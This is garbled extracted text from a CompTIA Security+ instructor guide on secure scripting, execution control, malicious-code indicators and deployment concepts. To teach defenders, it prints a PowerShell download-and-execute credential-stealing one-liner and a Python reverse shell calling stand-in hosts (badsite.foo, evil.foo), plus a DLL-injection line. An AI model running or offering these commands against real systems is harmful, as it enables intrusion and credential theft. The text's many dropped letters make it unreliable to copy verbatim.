7. What type of dynamic testing tool would you use to check input validation
on a web form?

A fuzzer can be used to submit known unsafe strings and randomized input to test
whether they are made safe by input validation or not.

esson 1 Summarizing Secure Application Concepts | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 390 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 14D
Implement Secure Script Environments

Teaching EXAM OBJECTIVES COVERED

Tip 1.4 Given a scenario, analyze potential indicators associated with network attacks
. Given a scenario, implement host or application security solutions
This topic focuses
on the uses and
4.1 Given a scenario, use the appropriate tool to assess organizational security
abuses of Python and
PowerShell. We also As a security technician, you will often have to develop automation scripts, using a
cover the application range of programming and scripting languages. Scripts can be used to return critical
security/code signing/
execution control
security assessment data and to configure hosts, so it is important that only validated
examples from code can be executed. You should also be able to identify malicious code in scripts
ob ective . . and macros.

Show Slide(s) Scripting

Scripting
Automation using scripting means that each configuration or build task is performed
by a block of code. The script will take standard arguments as data, so there is less
Teaching scope for uncertainty over configuration choices leading to errors. A script will use the
Tip following elements:
Aim to provide a • Parameters that the script takes as input data (passed to the script as arguments).
broad overview of
scripting technologies • ranching and looping statements that can alter the ow of e ecution based on
and practices.
logic conditions.
We will return to
orchestration in a bit • Validation and error handlers to check inputs and ensure robust execution.
more detail in the next
lesson. • Unit tests to ensure that the script returns the expected outputs, given the
e pected inputs.

Popular scripting languages for automation include PowerShell (docs.microsoft.

com/en-us/powershell/scripting/overview?view=powershell-7), Python (python.org),
JavaScript (w schools.com s), Ruby (ruby-lang.org/en), and Go (golang.org). Scripting
will also make use of domain specific languages, such as L, ML parsing, rege , and
orchestration tools.

Show Slide(s) A scripting language like Python is a general purpose or procedural language. It can be
adapted to perform many tasks. A domain-specific language ( S ) performs a particular
ython cript task, such as regex string parsing. Orchestration manages multiple automation scripts and
Environment configuration data to provision a service.

Teaching
Tip All coding languages have a specific synta that constrains the way sections of code are
Given the time laid out in blocks and the standard statements that are available, such as branching
allowed, ust try to and looping constructions.
ensure that students
can identify Python
code and interpret thon cript n ironment
basic code structures,
such as function Python is a popular language for implementing all kinds of development pro ects,
definitions, function including automation tools and security tools, as well as malicious scripts (python.org).
calls, and logical tests. Where many languages use brackets to denote blocks of code, Python uses indentation

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 391

(4 spaces per level, by convention). Any statement that starts a block is delimited by
a colon. Python is case-sensitive; for example, the variable user cannot be referred
to by the label User or USER. Comment lines are marked by the # character. You can
view inline help on modules, functions, and keywords using the help statement. For
example, the following command shows help for the print function: help(print)

Variables
Python uses the = operator to assign a name to a variable. Names are not declared
with a data type, such as string or integer, but Python is strongly typed, meaning that
you cannot multiply an integer variable by a string variable, for instance. String literals
can be delimited using single or double quotes.

Functions
Functions are used to produce modular, reusable code. A function takes some
arguments as parameters, performs some processing, and typically returns some
output. When creating a script, you will use some functions from Python's modules and
define your own functions. A function is defined using the following indentation synta
def fullname(name,surname):
return name + " " + surname
his ends the unction definition
#The next line calls the function to set a variable
greeting = 'Hello ' + fullname('World', '')
print(greeting)

Logic and Looping Statements

Branching and looping statements let you test conditions and perform repetitive
actions using compact code. Python uses the following comparison operators:

Operator Operation
== Is equal to
!= Is not equal to
< Is less than
> Is greater than
<= Is less than or equal to
>= Is greater than or equal to

A control block is written with indentation in the following general form:

if name == 'World':
#These indented statements are only executed if
the condition is true
print( nter your first name )
name = input()
print('Enter your surname')
surname = input()

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 392 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

#This ends the if statement as the next line is not

indented
greeting = 'Hello ' + fullname(name,surname)
Python uses only if for branching logic, though complex nested conditions can be
simplified with else and elif else if . Loops can be constructed using for and while.

Modules
A Python module is a library of functions for accomplishing standard tasks, such
as opening a network socket or interacting with an operating system's API. One of
the perceived strengths of Python is the huge number of modules. For example,
the os module contains functions to interact with the operating system, while the
socket module handles network connections and the url module opens and parses
resource addresses. Various extension modules allow a Python script to interact with
indows A Is.

The presence of two malicious libraries within a Python repository illustrates the potential
risks of third-party code (https://www.zdnet.com/article/two-malicious-python-libraries-
removed-from-pypi/).

Execution
Python is an interpreted language, executed within the context of a binary Python
process. In Windows, a Python script (.py) can be called via python.exe (with a
command window) or pythonw.exe (with no command window). A Python script can
also be compiled to a standalone Windows executable using the py2exe extension. This
executable can be digitally signed.

Show Slide(s) o er hell cript n ironment

ower hell cript
PowerShell is the preferred method of performing Windows administration tasks (docs.
Environment microsoft.com/en-us/powershell/scripting/overview?view=powershell-7). It has also
become the Windows hacker's go-to toolkit. PowerShell statements can be executed at a
Teaching ower hell prompt, or run as a script .ps on any ower hell enabled host.
Tip
The et elp cmdlet shows help on di erent elements of the ower hell environment.
Again, ust try to PowerShell is case-insensitive.
ensure that students
can recognize
PowerShell code and
Cmdlets and Functions
syntax.
Most PowerShell usage is founded on cmdlets. A cmdlet is a compiled library that
e poses some configuration or administrative task, such as starting a M in yper .
Cmdlets use a erb Noun naming convention. Cmdlets always return an ob ect.
Typically, the return from a cmdlet will be piped to some other cmdlet or function.
or e ample
Get-Process | Where { $_.name -eq 'nmap' } | Format-
List
ou can also define simple functions for use within your scripts. Custom functions
declared within curly brackets:
function Cat-Name {
param ($name,$surname)
return $name + ' ' + $surname
}

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 393

#This ends the function declaration; the next

statement calls it
$greeting = 'Hello ' + $(Cat-Name('World',''))
Write-Host $greeting
Note that a variable is declared by prefi ing a label with .

Logic and Looping Statements

PowerShell supports a wider range of branching and looping structures than Python,
including the switch and do statements. Curly brackets are used to structure the
statements. PowerShell uses textual operators (-eq, -ne, -lt, -gt, -le, and -ge).

Modules
PowerShell can also be used with a large number of modules, which are added to a
script using the Import-Module cmdlet.

Varonis' blog series illustrates uses of PowerShell as a security administration platform

(varonis.com blog practical-powershell-for-it-security-part-i-file-event-monitoring).

Execution Control Show Slide(s)

Execution control is the process of determining what additional software or scripts Execution Control
may be installed or run on a host beyond its baseline.
Teaching
Allow and Block Lists Tip
Execution control can be implemented as either an allow list or a block list. Terminology such as
black/whitelist is non-
• Allow list is a highly restrictive policy that means only running authorized processes inclusive and is being
and scripts. Allowing only specific applications that have been added to a list will replaced by neutral
terms (block/allow
inevitably hamper users at some point and increase support time and costs. For
lists).
example, a user might need to install a conferencing application at short notice.

• Block list is a permissive policy that only prevents execution of listed processes
and scripts. It is vulnerable to software that has not previously been identified as
malicious (or capable of or vulnerable to malicious use).

These concepts can also be referred to as whitelists and blacklists, but most sources now
deprecate this type of non-inclusive terminology.

Code Signing
Code signing is the principal means of proving the authenticity and integrity of code
an e ecutable or a script . The developer creates a cryptographic hash of the file then
signs the hash using his or her private key. The program is shipped with a copy of the
developer's code signing certificate, which contains a public key that the destination
computer uses to read and verify the signature. The OS then prompts the user to
choose whether to accept the signature and run the program.

OS-Based Execution Control

Execution control is often enforced using a third-party security product, but there are
some built-in Windows features that can perform the task:

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 394 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• Software Restriction Policies (SRP)—available for most versions and editions of

indows, can be configured as group policy ob ects s to passlist file
system locations from which executables and scripts can launch. Rules can also be
configured by publisher signature or by file hash. There is also support for creating
blocklist-based rules.

• AppLocker improves configuration options and default usage of . Notably

AppLocker policies can be applied to user and group accounts rather than ust
computer accounts. owever, AppLocker s can only be configured for
Enterprise and Ultimate editions of Windows 7 and later.

• Windows Defender Application Control (WDAC)—formerly Device Guard, this can

be used to create Code Integrity (CI) policies, which can be used on their own or
in con unction with AppLocker. CI policies apply to the computer and a ect all
users. CI policies can be based on version-aware and publisher digital signatures,
as well as image hashes and or file paths. DAC is a useful option for preventing
administrator accounts from disabling execution control options (docs.microsoft.
com/en-us/windows/security/threat-protection/windows-defender-application-
control/windows-defender-application-control . DAC is principally configured
using XML policy statements and PowerShell.

In indows, execution of PowerShell scripts can be inhibited by the execution policy. ote
that the execution policy is not an access control mechanism. It can be bypassed in any
number of different ways. AC is a robust mechanism for restricting use of potentially
dangerous code, such as malicious PowerShell.

In Linux, execution control is normally enforced by using a mandatory access control

(MAC) kernel module or Linux Security Module (LSM). The two main LSMs are
SELinux (access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/
deployment_guide/ch-selinux) and AppArmor (wiki.ubuntu.com/AppArmor).

Show Slide(s) Malicious Code Indicators

Malicious Code
As with bu er over ow, indicators of malicious code e ecution are either caught by
Indicators endpoint protection software or discovered after the fact in logs of how the malware
interacted with the network, file system, and registry. If you are performing threat
Teaching hunting or observing malware in a sandbox, it is helpful to consider the main types of
Tip malicious activity:
Note that indicators
are mostly gathered
• hellcode this is a minimal program designed to e ploit a bu er over ow or
from the way a similar vulnerability to gain privileges, or to drop a backdoor on the host if run as
malicious process a Tro an attack.mitre.org/tactics/TA0002). Having gained a foothold, this type of
interacts with the attack will be followed by some type of network connection to download additional
system. This evidence tools.
is gathered through
logging. The purpose • Credential dumping the malware might try to access the credentials file AM on
of EDR-type products a local indows workstation or sni credentials held in memory by the lsass.e e
is to provide real-time
automated analysis of system process (attack.mitre.org/tactics/TA0006).
code execution.
• Lateral movement/insider attack—the general procedure is to use the foothold
to execute a process remotely, using a tool such as psexec (docs.microsoft.com/
en-us/sysinternals/downloads/psexec) or PowerShell (attack.mitre.org/tactics/
TA0008 . The attacker might be seeking data assets or may try to widen access
by changing the system security configuration, such as opening a firewall port or
creating an account. If the attacker has compromised an account, these commands
can blend in with ordinary network operations, though they could be anomalous
behavior for that account.

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 395

• Persistence—this is a mechanism that the threat actor's backdoor is restarted if the

host reboots or the user logs o attack.mitre.org/tactics/TA0003). Typical methods
are to use AutoRun keys in the registry, adding a scheduled task, or using Windows
Management Instrumentation (WMI) event subscriptions.

PowerShell Malicious Indicators Show Slide(s)

There are numerous exploit frameworks to leverage PowerShell functionality, such as PowerShell Malicious
PowerShell Empire, PowerSploit, Metasploit, and Mimikatz. Some suspicious indicators Indicators
for PowerShell execution include the following:
Teaching
• Cmdlets such as Invoke-Expression, Invoke-Command, Invoke-WMIMethod, New-
Tip
ervice, Create Thread, tart rocess, and New b ect can indicate an attempt to
Aim to give students
run some type of binary shellcode. This is particularly suspicious if combined with
basic recognition
a DownloadString or DownloadFile argument. One complication is that cmdlets can of common attack
be shortened, assisting obfuscation. For example, Invoke-Expression can be run frameworks and
using IEX. potentially suspicious
cmdlets and usages.
powershell.exe "IEX (New-Object Net.WebClient).
DownloadString('https://badsite.foo/DoEvil.ps1');
Do-Evil -StealCreds"
• Bypassing execution policy can also act as an indicator. The PowerShell code may be
called as a Base64 encoded string (-enc argument) or may use the -noprofile
or -ExecutionPolicy bypass arguments.

• sing system calls to the indows A I might indicate an attempt to in ect a DLL
or perform process hollowing, where the malicious code takes over a legitimate
process:

[Kernel32]::LoadLibrary("C:\Users\Foo\AppData\Local\
Temp\doevil.dll")
• Using another type of script to execute the PowerShell is also suspicious. For
example, the attacker might use JavaScript code embedded in a PDF to launch
PowerShell via a vulnerable reader app.

The big problem with PowerShell indicators is distinguishing them from legitimate
behavior. The following techniques can be used to assist with this:
• Use group policy to restrict execution of PowerShell to trusted accounts and hosts.

• Use group policy execution control to run scripts only from trusted locations.

• Consider use of Constrained Language Mode (devblogs.microsoft.com/powershell/

powershell-constrained-language-mode) and signed scripts to limit the ability of
exploit code to run on high-value target systems.

• Use PowerShell logging (docs.microsoft.com/en-us/powershell/scripting/windows-

powershell/wmf/whats-new/script-logging?view=powershell-7) and the Antimalware
Scan Interface (docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps) to
detect and prevent obfuscated and suspicious code.

• Prevent the use of old PowerShell versions to mitigate the use of a downgrade
attack to bypass access controls.

Symantec's white paper contains a useful introduction to PowerShell exploits

(docs.broadcom.com/doc/increased-use-of-powershell-in-attacks-16-en).

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 396 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Bash and Python Malicious Indicators

Bash and Python
Most of the web runs on Linux, and Linux has proven remarkably resilient to attack,
Malicious Indicators given the high-value of the assets that depend on it. Most exploits of Linux systems
depend on weak configuration, and or vulnerabilities in web applications. In Linu , the
command line is usually Bourne Again Shell (Bash). Many Linux systems have Python
enabled as well. ython scripts or batch files of bash commands can be used for
automation tasks, such as backup, or for malicious purposes.
A malicious script running on a Linux host might attempt the following:
1. Use commands such as whoami and i config/ip/route to establish the
local context.

2. Download tools, possibly using wget or curl.

3. Add crontab entries to enable persistence.

4. Add a user to sudo and enable remote access via SSH.

5. Change firewall rules using iptables.

6. Use tools such as Nmap to scan for other hosts.

A very common vector for attacking Linux hosts is to use an exploit to install a web
shell as a backdoor (acunetix.com/blog/articles/introduction-web-shells-part-1). Typical
code to implement a reverse shell (connecting out to the machine at evil.foo on port
4444) is as follows:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("evil.foo",4444))
os.dup2(s.fileno() 0)
os.dup2(s.fileno() 1)
os.dup2(s.fileno() 2)
pty.spawn("/bin/sh")'
The os.dup2 statements redirect the terminal's data streams stdin (0), stdout (1),
and stderr to the socket ob ect s). The pty module provides a library of functions
for managing a pseudo-terminal, in this case starting the shell process at /bin/sh.
The code to implement a shell can be obfuscated in numerous ways. One way to
identify malicious scripts trying to match code samples is to scan the file system against
a configuration baseline, either using file integrity monitoring or use of the Linu diff
command.
Show Slide(s)
A common exploit for a vulnerable web server is to upload a cryptominer, misusing
Macros and Visual the server's CPU resources to try to obtain new cryptocurrency. You can use Linux
Basic for Applications utilities such as top and free to diagnose excessive CPU and memory resource
(VBA) consumption by such malware.

Teaching This white paper describes the use of ash and Python attack tools (f .com labs articles
Tip threat-intelligence/attackers-use-new--sophisticated-ways-to-install-cryptominers).
Students need to
look out for macros
or document scripts
that download binary Macros and Visual Basic for Applications (VBA)
data or try to execute
scripts in other A document macro is a sequence of actions performed in the context of a word
languages. processor, spreadsheet, or presentation file. hile the user may be able to record

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 397

macro steps using the GUI, ultimately macros are coded in a scripting language.
Microsoft ffice uses the Visual Basic for Applications (VBA) language, while PDF
documents use Java cript. Microsoft ffice document macros can be inspected
using ALT+F11. Other vendors and open-source software also implement macro
functionality, using languages such as Basic or Python.
A malicious actor will try to use a macro-enabled document to execute arbitrary
code. For example, a Word document could be the vector for executing a malicious
ower hell script. Macros are disabled by default in ffice, but the attacker may be
able to use a social engineering attack to get the user to change the policy.
With PDF, the JavaScript might be embedded within the document and designed to
exploit a known vulnerability in the reader software to execute without authorization
(sentinelone.com/blog/malicious-pdfs-revealing-techniques-behind-attacks).

Man-in-the-Browser Attack Show Slide(s)

A man-in-the-browser (MitB) attack is a specific type of on path attack where the web Man-in-the-Browser
browser is compromised. Depending on the level of privilege obtained, the attacker Attack
may be able to inspect session cookies, certificates, and data, change browser settings,
perform redirection, and in ect code.
A MitB attack may be accomplished by installing malicious plug-ins or scripts or
intercepting calls between the browser process and DLLs (attack.mitre.org/techniques/
T1185). The Browser Exploitation Framework (BeEF) (beefpro ect.com) is one well
known MitB tool. There are various vulnerability exploit kits that can be installed to a
website to actively try to exploit vulnerabilities in clients browsing the site (trendmicro.
com vinfo ie security definition e ploit kit). These kits may either be installed to a
legitimate site without the owner's knowledge (by compromising access control on
the web server) and load in an iFrame (invisible to the user), or the attacker may use
phishing/social engineering techniques to trick users into visiting the site.

The rowser Exploitation ramework ( eE ) uses a script to hook a browser.

The tool can be used to inspect session data and in ect code.

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 398 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Secure Script Environments
Answer the following questions:

1. You have been asked to investigate a web server for possible intrusion. You
identify a script with the following code. What language is the code in and
does it seem likely to be malicious?

import os, sockets, syslog

def r_conn(ip)
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("logging.trusted.foo",514))
...
The code is written in Python. It uses various modules with default library code to
interact with the and network, and also the syslog logging platform. The first lines
of code define a function to connect to a host over port syslog . C D AM
is a UDP connection, which is standard for syslog. Most likely the script is for remote
logging and unlikely to be malicious, especially if trusted.foo is a known domain.

2. Which tools can you use to restrict the use of PowerShell on Windows
clients

There are various group policy-based mechanisms, but for Windows 10, the Windows
Defender Application Control (WDAC) framework provides the most powerful toolset
for execution control policies.

3. A log shows that a PowerShell IEX process attempted to create a thread

in the target image c:\Windows\System32\lsass.exe. What is the aim of
this attac

The Local Security Authority Subsystem Service (LSASS) enforces security policies,
including authentication and password changes. Consequently, it holds hashes of user
passwords in memory. Attacks on lsass.exe are typically credential dumping to steal
those hashes.

4. You are discussing a security awareness training program for an SME's

employees. The business owner asserts that as they do not run Microsoft
ce des top apps there should e no need to co er document securit
and risks from embedded macros and scripts. Should you agree and not run
this part of the program?

No. hile isual asic for Applications A can only be used with Microsoft ffice,
other types of document can contain embedded scripts, such as JavaScript in PDFs.
ther ffice suites, such as pen ffice and Libre ffice, use scripting languages for
macros too.

esson 1 Summarizing Secure Application Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 399

Topic 14E
Summarize Deployment and
Automation oncepts

EXAM OBJECTIVES COVERED Teaching

. Summarize secure application development, deployment, and automation concepts Tip
We conclude the
development lesson
Most organizations use Agile methodologies, involving a development process of with a look at the
remaining content
continuous integration, delivery, and deployment. You will need to be able to support examples from
the creation and use of secure development and staging environments, plus the use of ob ective . , which
provisioning and deprovisioning tools. cluster around the
general concepts
of deployment and
Application Development, Deployment, and Automation automation.

A Dev ec ps culture gives pro ect teams a broad base of development, security, Show Slide(s)
and operations expertise and experience. This promotes an environment in which
security tasks make increased use of automation. Automation is the completion of
Application
an administrative task without human intervention. Task automation steps may be Development,
configurable through a I control panel, via a command line, or via an A I called Deployment, and
by scripts. Tasks can be automated to provision resources, add accounts, assign Automation
permissions, perform incident detection and response, and any number of other
network security tasks.
Manual configuration introduces a lot of scope for making errors. A technician may be
unsure of best practice, or there may be a lack of documentation. Over time, this leads to
many small discrepancies in the way instances and services are configured. These small
discrepancies can become big problems when it comes to maintaining, updating, and
securing IT and cloud infrastructure. Automation provides better scalability and elasticity:
• Scalability means that the costs involved in supplying the service to more users are
linear. For example, if the number of users doubles in a scalable system, the costs to Show Slide(s)
maintain the same level of service would also double (or less than double). If costs
more than double, the system is less scalable. Secure Application
Development
• Elasticity refers to the system's ability to handle changes on demand in real time. Environments
A system with high elasticity will not experience loss of service or performance if
demand suddenly doubles (or triples, or quadruples). Conversely, it may be important Teaching
for the system to be able to reduce costs when demand is low. Elasticity is a common Tip
selling point for cloud services. Instead of running a cloud resource for 24 hours a day, This syllabus revision
7 days a week, that resource can diminish in power or shut down completely when has removed waterfall
demand for that resource is low. When demand picks up again, the resource will grow and Agile as explicit
in power to the level re uired. This results in cost e ective operations. content examples.
We need to mention
them to explain
Secure Application Development Environments "continuous," but
students should not
Security must be a key component of the application or automation design process. need to know the
development life cycle
Even a simple form and script combination can make a web server vulnerable if the phases in anything
script is not well written. A software development life cycle (SDLC) divides the other than very
creation and maintenance of software into discrete phases. There are two principal general terms.

esson 1 Summarizing Secure Application Concepts | Topic 1 E

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 400 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

SDLCs: the waterfall model and Agile development. Both these models stress
the importance of requirements analysis and quality processes to the success of
development pro ects.

Quality Assurance (QA)

Quality processes are how an organization tests a system to identify whether it complies
with a set of requirements and expectations. These requirements and expectations can
be driven by risk-based assessments, or they can be driven by internal and external
compliance factors, such as industry regulations and company defined uality standards.
Quality control (QC) is the process of determining whether a system is free from defects or
deficiencies. C procedures are themselves defined by a quality assurance (QA) process,
which analyzes what constitutes "quality" and how it can be measured and checked.

Development Environments
To meet the demands of the life cycle model and quality assurance, code is normally
passed through several di erent environments
• Development—the code will be hosted on a secure server. Each developer will check
out a portion of code for editing on his or her local machine. The local machine will
normally be configured with a sandbo for local testing. This ensures that whatever
other processes are being run locally do not interfere with or compromise the
application being developed.
• Test/integration—in this environment, code from multiple developers is merged
to a single master copy and sub ected to basic unit and functional tests either
automated or by human testers). These tests aim to ensure that the code builds
correctly and fulfills the functions re uired by the design.
• Staging—this is a mirror of the production environment but may use test or sample
data and will have additional access controls so that it is only accessible to test
users. Testing at this stage will focus more on usability and performance.

• Production—the application is released to end users.

Secure development environments. (Images 1 .com.)

esson 1 Summarizing Secure Application Concepts | Topic 1 E

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 401

It is important to be able to validate the integrity of each coding environment.

Compromise in any environment could lead to the release of compromised code.
• Sandboxing—each development environment should be segmented from the
others. No processes should be able to connect to anything outside the sandbox.
Only the minimum tools and services necessary to perform code development and
testing should be allowed in each sandbox.

• ecure configuration baseline each development environment should be built to

the same specification, possibly using automated provisioning.

• Integrity measurement—this process determines whether the development

environment varies from the configuration baseline. erhaps a developer added an
unauthorized tool to solve some programming issue. Integrity measurement may
be performed by scanning for unsigned files or files that do not otherwise match the
baseline. The Linu diff command can be used to compare file structures
(linu .die.net man di ).

Provisioning, Deprovisioning, and Version Control Show Slide(s)

The use of development life cycle models and QA processes extends past development Provisioning,
and testing to the deployment and maintenance of an application or script-based Deprovisioning, and
automation task. Version Control

Provisioning
Provisioning is the process of deploying an application to the target environment,
such as enterprise desktops, mobile devices, or cloud infrastructure. An enterprise
provisioning manager might assemble multiple applications in a package. Alternatively,
the and applications might be defined as a single instance for deployment on a
virtualized platform. The provisioning process must account for changes to any of
these applications so that packages or instances are updated with the latest version.

Deprovisioning
Deprovisioning is the process of removing an application from packages or instances.
This might be necessary if software has to be completely rewritten or no longer
satisfies its purpose. As well as removing the application itself, it is also important to
make appropriate environment changes to remove any configurations such as open
firewall ports that were made ust to support that application.

Version Control
Version control is an ID system for each iteration of a software product. Most version
control numbers represent both the version, as made known to the customer or end
user, and internal build numbers for use in the development process. Version control
supports the change management process for software development pro ects. Most
software development environments use a build server to maintain a repository of
previous versions of the source code. When a developer commits new or changed
code to the repository, the new source code is tagged with an updated version number Show Slide(s)
and the old version archived. This allows changes to be rolled back if a problem is
discovered.
Automation/Scripting
Release Paradigms
Automation/Scripting Release Paradigms
Teaching
Coding pro ects are managed using di erent life cycle models. The waterfall model Tip
software development life cycle (SDLC) is an older paradigm that focuses on the Make sure students
successful completion of monolithic pro ects that progress from stage to stage. The can distinguish these
more recent Agile paradigm uses iterative processes to release well-tested code phases.

esson 1 Summarizing Secure Application Concepts | Topic 1 E

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 402 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

in smaller blocks or units. In this model, development and provisioning tasks are
conceived as continuous.

Continuous Integration
Continuous integration (CI) is the principle that developers should commit and test
updates often—every day or sometimes even more frequently. This is designed to
reduce the chances of two developers spending time on code changes that are later
found to con ict with one another. CI aims to detect and resolve these con icts early,
as it is easier to diagnose one or two con icts or build errors than it is to diagnose the
causes of tens of them. or e ective CI, it is important to use an automated test suite
to validate each build quickly.

Continuous Delivery
Where CI is about managing code in development, continuous delivery is about
testing all of the infrastructure that supports the app, including networking, database
functionality, client software, and so on.

Continuous Deployment
Where continuous delivery tests that an app version and its supporting infrastructure
are ready for production, continuous deployment is the separate process of actually
making changes to the production environment to support the new app version.

Automation and continuous release paradigms. (Images 1 .com.)

Continuous Monitoring and Automated Courses of Action

An automation solution will have a system of continuous monitoring to detect service
failures and security incidents. Continuous monitoring might use a locally installed
agent or heartbeat protocol or may involve checking availability remotely. As well as
monitoring the primary site, it is important to observe the failover components to

esson 1 Summarizing Secure Application Concepts | Topic 1 E

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 403

ensure that they are recovery ready. You can also automate the courses of action that
a monitoring system takes, like configuring an I to automatically block traffic that
it deems suspicious. This sort of capability is provided by security orchestration and
response (SOAR) management software.

Continuous Validation
An application model is a statement of the requirements driving the software
development pro ect. The re uirements model is tested using processes of verification
and validation (V&V):
• erification is a compliance testing process to ensure that the product or system
meets its design goals.

• alidation is the process of determining whether the application is fit for purpose
(so for instance, its design goals meet the user requirements).

With the continuous paradigm, feedback from delivery and deployment must be
monitored and evaluated to ensure that the design goals continue to meet user and
security requirements. The monitoring and validation processes must also ensure that
there is no drift from the secure configuration baseline.

Software Diversity Show Slide(s)

An application's runtime environment will use one of two approaches for execution on Software Diversity
a host system:
• Compiled code is converted to binary machine language that can run independently
on the target OS.

• Interpreted code is packaged pretty much as is but is compiled line-by-line by an

interpreter, such as ower hell or Java cript. This o ers a solution that is platform
independent because the interpreter resolves the di erences between types
and versions.

oftware diversity can refer to obfuscation techni ues to make code difficult to detect
as malicious. This is widely used by threat actors in the form of shellcode compilers
to avoid signature detection, such as the venerable Shikata Ga Nai (fireeye.com blog
threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html). This can
be used as a defensive technique. Obfuscating API methods and automation code
makes it harder for a threat actor to reverse engineer and analyze the code to discover
weaknesses.
There is also general research interest in security by diversity. This works on the
principle that attacks are harder to develop against non-standard environments. A
monoculture environment, such as a Windows domain network, presents a fairly
predictable attack surface with plenty of commodity malware tools available to exploit
misconfigurations. sing a wide range of development tools and application
vendors and versions can make attack strategies harder to research. As with security
by obscurity, this will not defeat a targeted attack, but it can partially mitigate risks
from less motivated threat actors, who will simply move to the next, easier target.
On the other hand, this sort of complexity will tend to lead to greater incidence of
configuration errors as technicians and developers struggle to master unfamiliar
technologies.

esson 1 Summarizing Secure Application Concepts | Topic 1 E

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 404 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
eployment and Automation oncepts
Answer the following questions:

1. What is secure staging?

Creating secure development environments for the di erent phases of a software

development pro ect initial development server, test integration server, staging user
test] server, production server).

2. What feature is essential for managing code iterations within the

provisioning and deprovisioning processes?

Version control is an ID system for each iteration of a software product.

3. Which life cycle process manages continuous release of code to the

production environment?

Continuous deployment.

4. o does a speciall confi ured compiler inhi it attac s throu h

so t are di ersit

The compiler can apply obfuscation routines to make the code difficult for a threat
actor to reverse engineer and analyze for vulnerabilities.

esson 1 Summarizing Secure Application Concepts | Topic 1 E

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 405

Lesson 14
Summary
You should be able to identify and classify application attacks and summarize Teaching
development and coding best practices. Tip
Check that students
Guidelines for Secure Application Development are confident about
the content that has
been covered. If there
ollow these guidelines for initiating or improving application development pro ects
is time, revisit any
• Train developers on secure coding techni ues to provide specific mitigation content examples that
against attacks they have questions
about. If you have
used all the available
• ver ow, race condition, and DLL driver manipulation attacks that e ploit
time for this lesson
vulnerable code. block, note the issues,
and schedule time for
• In ection attacks , L, ML, LDA , shellcode that e ploit lack of input a review later in the
validation. course.

• Replay and request forgery attacks that exploit lack of secure authentication and
authorization mechanisms.

• Review and test code using static and dynamic analysis, paying particular attention
to input validation, output encoding, error handling, and data exposure.

• Use automation and continuous integration/delivery/deployment/monitoring/

validation to ensure secure and consistent development, staging, and production
environments.

• Document use of approved coding languages and launch locations, ideally with code
signing, to make malicious code easier to detect.

esson 1 Summarizing Secure Application Concepts

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 15
Implementing Secure Cloud Solutions

LESSON INTRODUCTION Teaching

Tip
The main idea behind cloud computing is that you can access and manage your data This lesson follows
and applications from any host, anywhere in the world, while the storage method and on from application
location are hidden or abstracted through virtualization. Cloud applications—whether development to look
accessed as public services or provisioned over private virtualization infrastructure— at deploying apps
and services through
are rapidly overtaking on-premises service delivery models. Security in and of the cloud
virtualization and
considerations will form an increasingly important part of your career as a security the cloud. There is a
professional. significant amount
of new cloud content
in this exam update,
Lesson Objectives so be prepared to
allocate this section
In this lesson, you will: plenty of time.
• Summarize secure cloud and virtualization services.

• Apply cloud security solutions.

• Summarize infrastructure as code concepts.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 408 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 15A
